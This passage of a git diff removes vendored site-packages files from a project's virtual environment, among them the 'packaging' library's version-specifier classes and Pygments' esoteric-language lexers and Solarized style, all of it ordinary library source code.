item is contained within this specifier. - """ - - @abc.abstractmethod - def filter(self, iterable, prereleases=None): - # type: (Iterable[UnparsedVersion], Optional[bool]) -> Iterable[UnparsedVersion] - """ - Takes an iterable of items and filters them so that only items which - are contained within this specifier are allowed in it. - """ - - -class _IndividualSpecifier(BaseSpecifier): - - _operators = {} # type: Dict[str, str] - - def __init__(self, spec="", prereleases=None): - # type: (str, Optional[bool]) -> None - match = self._regex.search(spec) - if not match: - raise InvalidSpecifier("Invalid specifier: '{0}'".format(spec)) - - self._spec = ( - match.group("operator").strip(), - match.group("version").strip(), - ) # type: Tuple[str, str] - - # Store whether or not this Specifier should accept prereleases - self._prereleases = prereleases - - def __repr__(self): - # type: () -> str - pre = ( - ", prereleases={0!r}".format(self.prereleases) - if self._prereleases is not None - else "" - ) - - return "<{0}({1!r}{2})>".format(self.__class__.__name__, str(self), pre) - - def __str__(self): - # type: () -> str - return "{0}{1}".format(*self._spec) - - @property - def _canonical_spec(self): - # type: () -> Tuple[str, Union[Version, str]] - return self._spec[0], canonicalize_version(self._spec[1]) - - def __hash__(self): - # type: () -> int - return hash(self._canonical_spec) - - def __eq__(self, other): - # type: (object) -> bool - if isinstance(other, string_types): - try: - other = self.__class__(str(other)) - except InvalidSpecifier: - return NotImplemented - elif not isinstance(other, self.__class__): - return NotImplemented - - return self._canonical_spec == other._canonical_spec - - def __ne__(self, other): - # type: (object) -> bool - if isinstance(other, string_types): - try: - other = self.__class__(str(other)) - except InvalidSpecifier: - return NotImplemented - elif not isinstance(other, self.__class__): - return NotImplemented - - return self._spec != other._spec - - def _get_operator(self, op): - # type: (str) -> CallableOperator - operator_callable = getattr( - self, "_compare_{0}".format(self._operators[op]) - ) # type: CallableOperator - return operator_callable - - def _coerce_version(self, version): - # type: (UnparsedVersion) -> ParsedVersion - if not isinstance(version, (LegacyVersion, Version)): - version = parse(version) - return version - - @property - def operator(self): - # type: () -> str - return self._spec[0] - - @property - def version(self): - # type: () -> str - return self._spec[1] - - @property - def prereleases(self): - # type: () -> Optional[bool] - return self._prereleases - - @prereleases.setter - def prereleases(self, value): - # type: (bool) -> None - self._prereleases = value - - def __contains__(self, item): - # type: (str) -> bool - return self.contains(item) - - def contains(self, item, prereleases=None): - # type: (UnparsedVersion, Optional[bool]) -> bool - - # Determine if prereleases are to be allowed or not. - if prereleases is None: - prereleases = self.prereleases - - # Normalize item to a Version or LegacyVersion, this allows us to have - # a shortcut for ``"2.0" in Specifier(">=2") - normalized_item = self._coerce_version(item) - - # Determine if we should be supporting prereleases in this specifier - # or not, if we do not support prereleases than we can short circuit - # logic if this version is a prereleases. - if normalized_item.is_prerelease and not prereleases: - return False - - # Actually do the comparison to determine if this item is contained - # within this Specifier or not. - operator_callable = self._get_operator(self.operator) # type: CallableOperator - return operator_callable(normalized_item, self.version) - - def filter(self, iterable, prereleases=None): - # type: (Iterable[UnparsedVersion], Optional[bool]) -> Iterable[UnparsedVersion] - - yielded = False - found_prereleases = [] - - kw = {"prereleases": prereleases if prereleases is not None else True} - - # Attempt to iterate over all the values in the iterable and if any of - # them match, yield them. - for version in iterable: - parsed_version = self._coerce_version(version) - - if self.contains(parsed_version, **kw): - # If our version is a prerelease, and we were not set to allow - # prereleases, then we'll store it for later incase nothing - # else matches this specifier. - if parsed_version.is_prerelease and not ( - prereleases or self.prereleases - ): - found_prereleases.append(version) - # Either this is not a prerelease, or we should have been - # accepting prereleases from the beginning. - else: - yielded = True - yield version - - # Now that we've iterated over everything, determine if we've yielded - # any values, and if we have not and we have any prereleases stored up - # then we will go ahead and yield the prereleases. - if not yielded and found_prereleases: - for version in found_prereleases: - yield version - - -class LegacySpecifier(_IndividualSpecifier): - - _regex_str = r""" - (?P(==|!=|<=|>=|<|>)) - \s* - (?P - [^,;\s)]* # Since this is a "legacy" specifier, and the version - # string can be just about anything, we match everything - # except for whitespace, a semi-colon for marker support, - # a closing paren since versions can be enclosed in - # them, and a comma since it's a version separator. - ) - """ - - _regex = re.compile(r"^\s*" + _regex_str + r"\s*$", re.VERBOSE | re.IGNORECASE) - - _operators = { - "==": "equal", - "!=": "not_equal", - "<=": "less_than_equal", - ">=": "greater_than_equal", - "<": "less_than", - ">": "greater_than", - } - - def _coerce_version(self, version): - # type: (Union[ParsedVersion, str]) -> LegacyVersion - if not isinstance(version, LegacyVersion): - version = LegacyVersion(str(version)) - return version - - def _compare_equal(self, prospective, spec): - # type: (LegacyVersion, str) -> bool - return prospective == self._coerce_version(spec) - - def _compare_not_equal(self, prospective, spec): - # type: (LegacyVersion, str) -> bool - return prospective != self._coerce_version(spec) - - def _compare_less_than_equal(self, prospective, spec): - # type: (LegacyVersion, str) -> bool - return prospective <= self._coerce_version(spec) - - def _compare_greater_than_equal(self, prospective, spec): - # type: (LegacyVersion, str) -> bool - return prospective >= self._coerce_version(spec) - - def _compare_less_than(self, prospective, spec): - # type: (LegacyVersion, str) -> bool - return prospective < self._coerce_version(spec) - - def _compare_greater_than(self, prospective, spec): - # type: (LegacyVersion, str) -> bool - return prospective > self._coerce_version(spec) - - -def _require_version_compare( - fn # type: (Callable[[Specifier, ParsedVersion, str], bool]) -): - # type: (...) -> Callable[[Specifier, ParsedVersion, str], bool] - @functools.wraps(fn) - def wrapped(self, prospective, spec): - # type: (Specifier, ParsedVersion, str) -> bool - if not isinstance(prospective, Version): - return False - return fn(self, prospective, spec) - - return wrapped - - -class Specifier(_IndividualSpecifier): - - _regex_str = r""" - (?P(~=|==|!=|<=|>=|<|>|===)) - (?P - (?: - # The identity operators allow for an escape hatch that will - # do an exact string match of the version you wish to install. - # This will not be parsed by PEP 440 and we cannot determine - # any semantic meaning from it. This operator is discouraged - # but included entirely as an escape hatch. - (?<====) # Only match for the identity operator - \s* - [^\s]* # We just match everything, except for whitespace - # since we are only testing for strict identity. - ) - | - (?: - # The (non)equality operators allow for wild card and local - # versions to be specified so we have to define these two - # operators separately to enable that. - (?<===|!=) # Only match for equals and not equals - - \s* - v? - (?:[0-9]+!)? # epoch - [0-9]+(?:\.[0-9]+)* # release - (?: # pre release - [-_\.]? - (a|b|c|rc|alpha|beta|pre|preview) - [-_\.]? - [0-9]* - )? - (?: # post release - (?:-[0-9]+)|(?:[-_\.]?(post|rev|r)[-_\.]?[0-9]*) - )? - - # You cannot use a wild card and a dev or local version - # together so group them with a | and make them optional. - (?: - (?:[-_\.]?dev[-_\.]?[0-9]*)? # dev release - (?:\+[a-z0-9]+(?:[-_\.][a-z0-9]+)*)? # local - | - \.\* # Wild card syntax of .* - )? - ) - | - (?: - # The compatible operator requires at least two digits in the - # release segment. - (?<=~=) # Only match for the compatible operator - - \s* - v? - (?:[0-9]+!)? # epoch - [0-9]+(?:\.[0-9]+)+ # release (We have a + instead of a *) - (?: # pre release - [-_\.]? - (a|b|c|rc|alpha|beta|pre|preview) - [-_\.]? - [0-9]* - )? - (?: # post release - (?:-[0-9]+)|(?:[-_\.]?(post|rev|r)[-_\.]?[0-9]*) - )? - (?:[-_\.]?dev[-_\.]?[0-9]*)? # dev release - ) - | - (?: - # All other operators only allow a sub set of what the - # (non)equality operators do. Specifically they do not allow - # local versions to be specified nor do they allow the prefix - # matching wild cards. - (?=": "greater_than_equal", - "<": "less_than", - ">": "greater_than", - "===": "arbitrary", - } - - @_require_version_compare - def _compare_compatible(self, prospective, spec): - # type: (ParsedVersion, str) -> bool - - # Compatible releases have an equivalent combination of >= and ==. That - # is that ~=2.2 is equivalent to >=2.2,==2.*. This allows us to - # implement this in terms of the other specifiers instead of - # implementing it ourselves. The only thing we need to do is construct - # the other specifiers. - - # We want everything but the last item in the version, but we want to - # ignore post and dev releases and we want to treat the pre-release as - # it's own separate segment. - prefix = ".".join( - list( - itertools.takewhile( - lambda x: (not x.startswith("post") and not x.startswith("dev")), - _version_split(spec), - ) - )[:-1] - ) - - # Add the prefix notation to the end of our string - prefix += ".*" - - return self._get_operator(">=")(prospective, spec) and self._get_operator("==")( - prospective, prefix - ) - - @_require_version_compare - def _compare_equal(self, prospective, spec): - # type: (ParsedVersion, str) -> bool - - # We need special logic to handle prefix matching - if spec.endswith(".*"): - # In the case of prefix matching we want to ignore local segment. - prospective = Version(prospective.public) - # Split the spec out by dots, and pretend that there is an implicit - # dot in between a release segment and a pre-release segment. - split_spec = _version_split(spec[:-2]) # Remove the trailing .* - - # Split the prospective version out by dots, and pretend that there - # is an implicit dot in between a release segment and a pre-release - # segment. - split_prospective = _version_split(str(prospective)) - - # Shorten the prospective version to be the same length as the spec - # so that we can determine if the specifier is a prefix of the - # prospective version or not. - shortened_prospective = split_prospective[: len(split_spec)] - - # Pad out our two sides with zeros so that they both equal the same - # length. - padded_spec, padded_prospective = _pad_version( - split_spec, shortened_prospective - ) - - return padded_prospective == padded_spec - else: - # Convert our spec string into a Version - spec_version = Version(spec) - - # If the specifier does not have a local segment, then we want to - # act as if the prospective version also does not have a local - # segment. - if not spec_version.local: - prospective = Version(prospective.public) - - return prospective == spec_version - - @_require_version_compare - def _compare_not_equal(self, prospective, spec): - # type: (ParsedVersion, str) -> bool - return not self._compare_equal(prospective, spec) - - @_require_version_compare - def _compare_less_than_equal(self, prospective, spec): - # type: (ParsedVersion, str) -> bool - - # NB: Local version identifiers are NOT permitted in the version - # specifier, so local version labels can be universally removed from - # the prospective version. - return Version(prospective.public) <= Version(spec) - - @_require_version_compare - def _compare_greater_than_equal(self, prospective, spec): - # type: (ParsedVersion, str) -> bool - - # NB: Local version identifiers are NOT permitted in the version - # specifier, so local version labels can be universally removed from - # the prospective version. - return Version(prospective.public) >= Version(spec) - - @_require_version_compare - def _compare_less_than(self, prospective, spec_str): - # type: (ParsedVersion, str) -> bool - - # Convert our spec to a Version instance, since we'll want to work with - # it as a version. - spec = Version(spec_str) - - # Check to see if the prospective version is less than the spec - # version. If it's not we can short circuit and just return False now - # instead of doing extra unneeded work. - if not prospective < spec: - return False - - # This special case is here so that, unless the specifier itself - # includes is a pre-release version, that we do not accept pre-release - # versions for the version mentioned in the specifier (e.g. <3.1 should - # not match 3.1.dev0, but should match 3.0.dev0). - if not spec.is_prerelease and prospective.is_prerelease: - if Version(prospective.base_version) == Version(spec.base_version): - return False - - # If we've gotten to here, it means that prospective version is both - # less than the spec version *and* it's not a pre-release of the same - # version in the spec. - return True - - @_require_version_compare - def _compare_greater_than(self, prospective, spec_str): - # type: (ParsedVersion, str) -> bool - - # Convert our spec to a Version instance, since we'll want to work with - # it as a version. - spec = Version(spec_str) - - # Check to see if the prospective version is greater than the spec - # version. If it's not we can short circuit and just return False now - # instead of doing extra unneeded work. - if not prospective > spec: - return False - - # This special case is here so that, unless the specifier itself - # includes is a post-release version, that we do not accept - # post-release versions for the version mentioned in the specifier - # (e.g. >3.1 should not match 3.0.post0, but should match 3.2.post0). - if not spec.is_postrelease and prospective.is_postrelease: - if Version(prospective.base_version) == Version(spec.base_version): - return False - - # Ensure that we do not allow a local version of the version mentioned - # in the specifier, which is technically greater than, to match. - if prospective.local is not None: - if Version(prospective.base_version) == Version(spec.base_version): - return False - - # If we've gotten to here, it means that prospective version is both - # greater than the spec version *and* it's not a pre-release of the - # same version in the spec. - return True - - def _compare_arbitrary(self, prospective, spec): - # type: (Version, str) -> bool - return str(prospective).lower() == str(spec).lower() - - @property - def prereleases(self): - # type: () -> bool - - # If there is an explicit prereleases set for this, then we'll just - # blindly use that. - if self._prereleases is not None: - return self._prereleases - - # Look at all of our specifiers and determine if they are inclusive - # operators, and if they are if they are including an explicit - # prerelease. - operator, version = self._spec - if operator in ["==", ">=", "<=", "~=", "==="]: - # The == specifier can include a trailing .*, if it does we - # want to remove before parsing. - if operator == "==" and version.endswith(".*"): - version = version[:-2] - - # Parse the version, and if it is a pre-release than this - # specifier allows pre-releases. - if parse(version).is_prerelease: - return True - - return False - - @prereleases.setter - def prereleases(self, value): - # type: (bool) -> None - self._prereleases = value - - -_prefix_regex = re.compile(r"^([0-9]+)((?:a|b|c|rc)[0-9]+)$") - - -def _version_split(version): - # type: (str) -> List[str] - result = [] # type: List[str] - for item in version.split("."): - match = _prefix_regex.search(item) - if match: - result.extend(match.groups()) - else: - result.append(item) - return result - - -def _pad_version(left, right): - # type: (List[str], List[str]) -> Tuple[List[str], List[str]] - left_split, right_split = [], [] - - # Get the release segment of our versions - left_split.append(list(itertools.takewhile(lambda x: x.isdigit(), left))) - right_split.append(list(itertools.takewhile(lambda x: x.isdigit(), right))) - - # Get the rest of our versions - left_split.append(left[len(left_split[0]) :]) - right_split.append(right[len(right_split[0]) :]) - - # Insert our padding - left_split.insert(1, ["0"] * max(0, len(right_split[0]) - len(left_split[0]))) - right_split.insert(1, ["0"] * max(0, len(left_split[0]) - len(right_split[0]))) - - return (list(itertools.chain(*left_split)), list(itertools.chain(*right_split))) - - -class SpecifierSet(BaseSpecifier): - def __init__(self, specifiers="", prereleases=None): - # type: (str, Optional[bool]) -> None - - # Split on , to break each individual specifier into it's own item, and - # strip each item to remove leading/trailing whitespace. - split_specifiers = [s.strip() for s in specifiers.split(",") if s.strip()] - - # Parsed each individual specifier, attempting first to make it a - # Specifier and falling back to a LegacySpecifier. - parsed = set() - for specifier in split_specifiers: - try: - parsed.add(Specifier(specifier)) - except InvalidSpecifier: - parsed.add(LegacySpecifier(specifier)) - - # Turn our parsed specifiers into a frozen set and save them for later. - self._specs = frozenset(parsed) - - # Store our prereleases value so we can use it later to determine if - # we accept prereleases or not. - self._prereleases = prereleases - - def __repr__(self): - # type: () -> str - pre = ( - ", prereleases={0!r}".format(self.prereleases) - if self._prereleases is not None - else "" - ) - - return "".format(str(self), pre) - - def __str__(self): - # type: () -> str - return ",".join(sorted(str(s) for s in self._specs)) - - def __hash__(self): - # type: () -> int - return hash(self._specs) - - def __and__(self, other): - # type: (Union[SpecifierSet, str]) -> SpecifierSet - if isinstance(other, string_types): - other = SpecifierSet(other) - elif not isinstance(other, SpecifierSet): - return NotImplemented - - specifier = SpecifierSet() - specifier._specs = frozenset(self._specs | other._specs) - - if self._prereleases is None and other._prereleases is not None: - specifier._prereleases = other._prereleases - elif self._prereleases is not None and other._prereleases is None: - specifier._prereleases = self._prereleases - elif self._prereleases == other._prereleases: - specifier._prereleases = self._prereleases - else: - raise ValueError( - "Cannot combine SpecifierSets with True and False prerelease " - "overrides." - ) - - return specifier - - def __eq__(self, other): - # type: (object) -> bool - if isinstance(other, (string_types, _IndividualSpecifier)): - other = SpecifierSet(str(other)) - elif not isinstance(other, SpecifierSet): - return NotImplemented - - return self._specs == other._specs - - def __ne__(self, other): - # type: (object) -> bool - if isinstance(other, (string_types, _IndividualSpecifier)): - other = SpecifierSet(str(other)) - elif not isinstance(other, SpecifierSet): - return NotImplemented - - return self._specs != other._specs - - def __len__(self): - # type: () -> int - return len(self._specs) - - def __iter__(self): - # type: () -> Iterator[FrozenSet[_IndividualSpecifier]] - return iter(self._specs) - - @property - def prereleases(self): - # type: () -> Optional[bool] - - # If we have been given an explicit prerelease modifier, then we'll - # pass that through here. - if self._prereleases is not None: - return self._prereleases - - # If we don't have any specifiers, and we don't have a forced value, - # then we'll just return None since we don't know if this should have - # pre-releases or not. - if not self._specs: - return None - - # Otherwise we'll see if any of the given specifiers accept - # prereleases, if any of them do we'll return True, otherwise False. - return any(s.prereleases for s in self._specs) - - @prereleases.setter - def prereleases(self, value): - # type: (bool) -> None - self._prereleases = value - - def __contains__(self, item): - # type: (Union[ParsedVersion, str]) -> bool - return self.contains(item) - - def contains(self, item, prereleases=None): - # type: (Union[ParsedVersion, str], Optional[bool]) -> bool - - # Ensure that our item is a Version or LegacyVersion instance. - if not isinstance(item, (LegacyVersion, Version)): - item = parse(item) - - # Determine if we're forcing a prerelease or not, if we're not forcing - # one for this particular filter call, then we'll use whatever the - # SpecifierSet thinks for whether or not we should support prereleases. - if prereleases is None: - prereleases = self.prereleases - - # We can determine if we're going to allow pre-releases by looking to - # see if any of the underlying items supports them. If none of them do - # and this item is a pre-release then we do not allow it and we can - # short circuit that here. - # Note: This means that 1.0.dev1 would not be contained in something - # like >=1.0.devabc however it would be in >=1.0.debabc,>0.0.dev0 - if not prereleases and item.is_prerelease: - return False - - # We simply dispatch to the underlying specs here to make sure that the - # given version is contained within all of them. - # Note: This use of all() here means that an empty set of specifiers - # will always return True, this is an explicit design decision. - return all(s.contains(item, prereleases=prereleases) for s in self._specs) - - def filter( - self, - iterable, # type: Iterable[Union[ParsedVersion, str]] - prereleases=None, # type: Optional[bool] - ): - # type: (...) -> Iterable[Union[ParsedVersion, str]] - - # Determine if we're forcing a prerelease or not, if we're not forcing - # one for this particular filter call, then we'll use whatever the - # SpecifierSet thinks for whether or not we should support prereleases. - if prereleases is None: - prereleases = self.prereleases - - # If we have any specifiers, then we want to wrap our iterable in the - # filter method for each one, this will act as a logical AND amongst - # each specifier. - if self._specs: - for spec in self._specs: - iterable = spec.filter(iterable, prereleases=bool(prereleases)) - return iterable - # If we do not have any specifiers, then we need to have a rough filter - # which will filter out any pre-releases, unless there are no final - # releases, and which will filter out LegacyVersion in general. - else: - filtered = [] # type: List[Union[ParsedVersion, str]] - found_prereleases = [] # type: List[Union[ParsedVersion, str]] - - for item in iterable: - # Ensure that we some kind of Version class for this item. - if not isinstance(item, (LegacyVersion, Version)): - parsed_version = parse(item) - else: - parsed_version = item - - # Filter out any item which is parsed as a LegacyVersion - if isinstance(parsed_version, LegacyVersion): - continue - - # Store any item which is a pre-release for later unless we've - # already found a final version or we are accepting prereleases - if parsed_version.is_prerelease and not prereleases: - if not filtered: - found_prereleases.append(item) - else: - filtered.append(item) - - # If we've found no items except for pre-releases, then we'll go - # ahead and use the pre-releases - if not filtered and found_prereleases and prereleases is None: - return found_prereleases - - return filtered diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/lexers/esoteric.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/lexers/esoteric.py deleted file mode 100644 index ccc280541f3d96325bc1f38dc147452e20df83f1..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/lexers/esoteric.py +++ /dev/null @@ -1,301 +0,0 @@ -""" - pygments.lexers.esoteric - ~~~~~~~~~~~~~~~~~~~~~~~~ - - Lexers for esoteric languages. - - :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS. - :license: BSD, see LICENSE for details. -""" - -from pygments.lexer import RegexLexer, include, words, bygroups -from pygments.token import Comment, Operator, Keyword, Name, String, Number, \ - Punctuation, Error, Whitespace - -__all__ = ['BrainfuckLexer', 'BefungeLexer', 'RedcodeLexer', 'CAmkESLexer', - 'CapDLLexer', 'AheuiLexer'] - - -class BrainfuckLexer(RegexLexer): - """ - Lexer for the esoteric BrainFuck language. - """ - - name = 'Brainfuck' - url = 'http://www.muppetlabs.com/~breadbox/bf/' - aliases = ['brainfuck', 'bf'] - filenames = ['*.bf', '*.b'] - mimetypes = ['application/x-brainfuck'] - - tokens = { - 'common': [ - # use different colors for different instruction types - (r'[.,]+', Name.Tag), - (r'[+-]+', Name.Builtin), - (r'[<>]+', Name.Variable), - (r'[^.,+\-<>\[\]]+', Comment), - ], - 'root': [ - (r'\[', Keyword, 'loop'), - (r'\]', Error), - include('common'), - ], - 'loop': [ - (r'\[', Keyword, '#push'), - (r'\]', Keyword, '#pop'), - include('common'), - ] - } - - def analyse_text(text): - """It's safe to assume that a program which mostly consists of + - - and < > is brainfuck.""" - plus_minus_count = 0 - greater_less_count = 0 - - range_to_check = max(256, len(text)) - - for c in text[:range_to_check]: - if c == '+' or c == '-': - plus_minus_count += 1 - if c == '<' or c == '>': - greater_less_count += 1 - - if plus_minus_count > (0.25 * range_to_check): - return 1.0 - if greater_less_count > (0.25 * range_to_check): - return 1.0 - - result = 0 - if '[-]' in text: - result += 0.5 - - return result - - -class BefungeLexer(RegexLexer): - """ - Lexer for the esoteric Befunge language. - - .. versionadded:: 0.7 - """ - name = 'Befunge' - url = 'http://en.wikipedia.org/wiki/Befunge' - aliases = ['befunge'] - filenames = ['*.befunge'] - mimetypes = ['application/x-befunge'] - - tokens = { - 'root': [ - (r'[0-9a-f]', Number), - (r'[+*/%!`-]', Operator), # Traditional math - (r'[<>^v?\[\]rxjk]', Name.Variable), # Move, imperatives - (r'[:\\$.,n]', Name.Builtin), # Stack ops, imperatives - (r'[|_mw]', Keyword), - (r'[{}]', Name.Tag), # Befunge-98 stack ops - (r'".*?"', String.Double), # Strings don't appear to allow escapes - (r'\'.', String.Single), # Single character - (r'[#;]', Comment), # Trampoline... depends on direction hit - (r'[pg&~=@iotsy]', Keyword), # Misc - (r'[()A-Z]', Comment), # Fingerprints - (r'\s+', Whitespace), # Whitespace doesn't matter - ], - } - - -class CAmkESLexer(RegexLexer): - """ - Basic lexer for the input language for the CAmkES component platform. - - .. versionadded:: 2.1 - """ - name = 'CAmkES' - url = 'https://sel4.systems/CAmkES/' - aliases = ['camkes', 'idl4'] - filenames = ['*.camkes', '*.idl4'] - - tokens = { - 'root': [ - # C pre-processor directive - (r'^(\s*)(#.*)(\n)', bygroups(Whitespace, Comment.Preproc, - Whitespace)), - - # Whitespace, comments - (r'\s+', Whitespace), - (r'/\*(.|\n)*?\*/', Comment), - (r'//.*$', Comment), - - (r'[\[(){},.;\]]', Punctuation), - (r'[~!%^&*+=|?:<>/-]', Operator), - - (words(('assembly', 'attribute', 'component', 'composition', - 'configuration', 'connection', 'connector', 'consumes', - 'control', 'dataport', 'Dataport', 'Dataports', 'emits', - 'event', 'Event', 'Events', 'export', 'from', 'group', - 'hardware', 'has', 'interface', 'Interface', 'maybe', - 'procedure', 'Procedure', 'Procedures', 'provides', - 'template', 'thread', 'threads', 'to', 'uses', 'with'), - suffix=r'\b'), Keyword), - - (words(('bool', 'boolean', 'Buf', 'char', 'character', 'double', - 'float', 'in', 'inout', 'int', 'int16_6', 'int32_t', - 'int64_t', 'int8_t', 'integer', 'mutex', 'out', 'real', - 'refin', 'semaphore', 'signed', 'string', 'struct', - 'uint16_t', 'uint32_t', 'uint64_t', 'uint8_t', 'uintptr_t', - 'unsigned', 'void'), - suffix=r'\b'), Keyword.Type), - - # Recognised attributes - (r'[a-zA-Z_]\w*_(priority|domain|buffer)', Keyword.Reserved), - (words(('dma_pool', 'from_access', 'to_access'), suffix=r'\b'), - Keyword.Reserved), - - # CAmkES-level include - (r'(import)(\s+)((?:<[^>]*>|"[^"]*");)', - bygroups(Comment.Preproc, Whitespace, Comment.Preproc)), - - # C-level include - (r'(include)(\s+)((?:<[^>]*>|"[^"]*");)', - bygroups(Comment.Preproc, Whitespace, Comment.Preproc)), - - # Literals - (r'0[xX][\da-fA-F]+', Number.Hex), - (r'-?[\d]+', Number), - (r'-?[\d]+\.[\d]+', Number.Float), - (r'"[^"]*"', String), - (r'[Tt]rue|[Ff]alse', Name.Builtin), - - # Identifiers - (r'[a-zA-Z_]\w*', Name), - ], - } - - -class CapDLLexer(RegexLexer): - """ - Basic lexer for CapDL. - - The source of the primary tool that reads such specifications is available - at https://github.com/seL4/capdl/tree/master/capDL-tool. Note that this - lexer only supports a subset of the grammar. For example, identifiers can - shadow type names, but these instances are currently incorrectly - highlighted as types. Supporting this would need a stateful lexer that is - considered unnecessarily complex for now. - - .. versionadded:: 2.2 - """ - name = 'CapDL' - url = 'https://ssrg.nicta.com.au/publications/nictaabstracts/Kuz_KLW_10.abstract.pml' - aliases = ['capdl'] - filenames = ['*.cdl'] - - tokens = { - 'root': [ - # C pre-processor directive - (r'^(\s*)(#.*)(\n)', - bygroups(Whitespace, Comment.Preproc, Whitespace)), - - # Whitespace, comments - (r'\s+', Whitespace), - (r'/\*(.|\n)*?\*/', Comment), - (r'(//|--).*$', Comment), - - (r'[<>\[(){},:;=\]]', Punctuation), - (r'\.\.', Punctuation), - - (words(('arch', 'arm11', 'caps', 'child_of', 'ia32', 'irq', 'maps', - 'objects'), suffix=r'\b'), Keyword), - - (words(('aep', 'asid_pool', 'cnode', 'ep', 'frame', 'io_device', - 'io_ports', 'io_pt', 'notification', 'pd', 'pt', 'tcb', - 'ut', 'vcpu'), suffix=r'\b'), Keyword.Type), - - # Properties - (words(('asid', 'addr', 'badge', 'cached', 'dom', 'domainID', 'elf', - 'fault_ep', 'G', 'guard', 'guard_size', 'init', 'ip', - 'prio', 'sp', 'R', 'RG', 'RX', 'RW', 'RWG', 'RWX', 'W', - 'WG', 'WX', 'level', 'masked', 'master_reply', 'paddr', - 'ports', 'reply', 'uncached'), suffix=r'\b'), - Keyword.Reserved), - - # Literals - (r'0[xX][\da-fA-F]+', Number.Hex), - (r'\d+(\.\d+)?(k|M)?', Number), - (words(('bits',), suffix=r'\b'), Number), - (words(('cspace', 'vspace', 'reply_slot', 'caller_slot', - 'ipc_buffer_slot'), suffix=r'\b'), Number), - - # Identifiers - (r'[a-zA-Z_][-@\.\w]*', Name), - ], - } - - -class RedcodeLexer(RegexLexer): - """ - A simple Redcode lexer based on ICWS'94. - Contributed by Adam Blinkinsop . - - .. versionadded:: 0.8 - """ - name = 'Redcode' - aliases = ['redcode'] - filenames = ['*.cw'] - - opcodes = ('DAT', 'MOV', 'ADD', 'SUB', 'MUL', 'DIV', 'MOD', - 'JMP', 'JMZ', 'JMN', 'DJN', 'CMP', 'SLT', 'SPL', - 'ORG', 'EQU', 'END') - modifiers = ('A', 'B', 'AB', 'BA', 'F', 'X', 'I') - - tokens = { - 'root': [ - # Whitespace: - (r'\s+', Whitespace), - (r';.*$', Comment.Single), - # Lexemes: - # Identifiers - (r'\b(%s)\b' % '|'.join(opcodes), Name.Function), - (r'\b(%s)\b' % '|'.join(modifiers), Name.Decorator), - (r'[A-Za-z_]\w+', Name), - # Operators - (r'[-+*/%]', Operator), - (r'[#$@<>]', Operator), # mode - (r'[.,]', Punctuation), # mode - # Numbers - (r'[-+]?\d+', Number.Integer), - ], - } - - -class AheuiLexer(RegexLexer): - """ - Aheui is esoteric language based on Korean alphabets. - """ - - name = 'Aheui' - url = 'http://aheui.github.io/' - aliases = ['aheui'] - filenames = ['*.aheui'] - - tokens = { - 'root': [ - ('[' - '나-낳냐-냫너-넣녀-녛노-놓뇨-눟뉴-닇' - '다-닿댜-댷더-덯뎌-뎧도-돟됴-둫듀-딓' - '따-땋땨-떃떠-떻뗘-뗳또-똫뚀-뚷뜌-띟' - '라-랗랴-럏러-렇려-렿로-롷료-뤃류-릫' - '마-맣먀-먛머-멓며-몋모-뫃묘-뭏뮤-믷' - '바-밯뱌-뱧버-벟벼-볗보-봏뵤-붛뷰-빃' - '빠-빻뺘-뺳뻐-뻫뼈-뼣뽀-뽛뾰-뿧쀼-삏' - '사-샇샤-샿서-섷셔-셯소-솧쇼-숳슈-싛' - '싸-쌓쌰-썋써-쎃쎠-쎻쏘-쏳쑈-쑿쓔-씧' - '자-잫쟈-쟣저-젛져-졓조-좋죠-줗쥬-즿' - '차-챃챠-챻처-첳쳐-쳫초-촣쵸-춯츄-칗' - '카-캏캬-컇커-컿켜-켷코-콯쿄-쿻큐-킣' - '타-탛탸-턓터-텋텨-톃토-톻툐-퉇튜-틯' - '파-팧퍄-퍟퍼-펗펴-폏포-퐇표-풓퓨-픻' - '하-핳햐-햫허-헣혀-혛호-홓효-훟휴-힇' - ']', Operator), - ('.', Comment), - ], - } diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/styles/solarized.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/styles/solarized.py deleted file mode 100644 index e75aa602fedece79436890b6ce854579e0dad65f..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/styles/solarized.py +++ /dev/null @@ -1,137 +0,0 @@ -""" - pygments.styles.solarized - ~~~~~~~~~~~~~~~~~~~~~~~~~ - - Solarized by Camil Staps - - A Pygments style for the Solarized themes (licensed under MIT). - See: https://github.com/altercation/solarized - - :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS. - :license: BSD, see LICENSE for details. -""" - -from pygments.style import Style -from pygments.token import Comment, Error, Generic, Keyword, Name, Number, \ - Operator, String, Token - - -def make_style(colors): - return { - Token: colors['base0'], - - Comment: 'italic ' + colors['base01'], - Comment.Hashbang: colors['base01'], - Comment.Multiline: colors['base01'], - Comment.Preproc: 'noitalic ' + colors['magenta'], - Comment.PreprocFile: 'noitalic ' + colors['base01'], - - Keyword: colors['green'], - Keyword.Constant: colors['cyan'], - Keyword.Declaration: colors['cyan'], - Keyword.Namespace: colors['orange'], - Keyword.Type: colors['yellow'], - - Operator: colors['base01'], - Operator.Word: colors['green'], - - Name.Builtin: colors['blue'], - Name.Builtin.Pseudo: colors['blue'], - Name.Class: colors['blue'], - Name.Constant: colors['blue'], - Name.Decorator: colors['blue'], - Name.Entity: colors['blue'], - Name.Exception: colors['blue'], - Name.Function: colors['blue'], - Name.Function.Magic: colors['blue'], - Name.Label: colors['blue'], - Name.Namespace: colors['blue'], - Name.Tag: colors['blue'], - Name.Variable: colors['blue'], - Name.Variable.Global:colors['blue'], - Name.Variable.Magic: colors['blue'], - - String: colors['cyan'], - String.Doc: colors['base01'], - String.Regex: colors['orange'], - - Number: colors['cyan'], - - Generic: colors['base0'], - Generic.Deleted: colors['red'], - Generic.Emph: 'italic', - Generic.Error: colors['red'], - Generic.Heading: 'bold', - Generic.Subheading: 'underline', - Generic.Inserted: colors['green'], - Generic.Output: colors['base0'], - Generic.Prompt: 'bold ' + colors['blue'], - Generic.Strong: 'bold', - Generic.EmphStrong: 'bold italic', - Generic.Traceback: colors['blue'], - - Error: 'bg:' + colors['red'], - } - - -DARK_COLORS = { - 'base03': '#002b36', - 'base02': '#073642', - 'base01': '#586e75', - 